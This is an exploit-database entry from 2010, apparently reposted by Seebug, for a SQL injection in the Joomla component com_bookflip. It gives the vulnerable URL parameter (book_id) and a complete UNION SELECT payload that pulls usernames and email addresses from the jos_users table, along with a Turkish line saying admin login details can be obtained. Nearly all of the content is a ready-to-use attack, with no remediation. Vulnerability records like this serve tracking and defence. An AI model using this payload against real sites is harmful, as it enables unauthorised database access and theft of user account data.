Joomla Component com_bookflip SQL Injection Vulnerability

2010-01-21T00:00:00
ID SSV:18970
Type seebug
Reporter Root
Modified 2010-01-21T00:00:00

Description

No description provided by source.

                                        
                                            
                                                ########################################################################
#        Joomla Component com_bookflip SQL Injection Vulnerability
########################################################################
# Author   :FL0RiX
#
# Name     : com_bookflip
#
# Bug Type   : SQL Injection
#
# Infection    : Admin login bilgileri alinabilir.
#
# Demo Vuln :
#
# http://server/index.php?option=com_bookflip&Itemid=35&book_id=[EXPLOIT]
#
# EXPLOIT : null+union+select+1,concat(username,0x3a,email),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+jos_users--
#############################################################################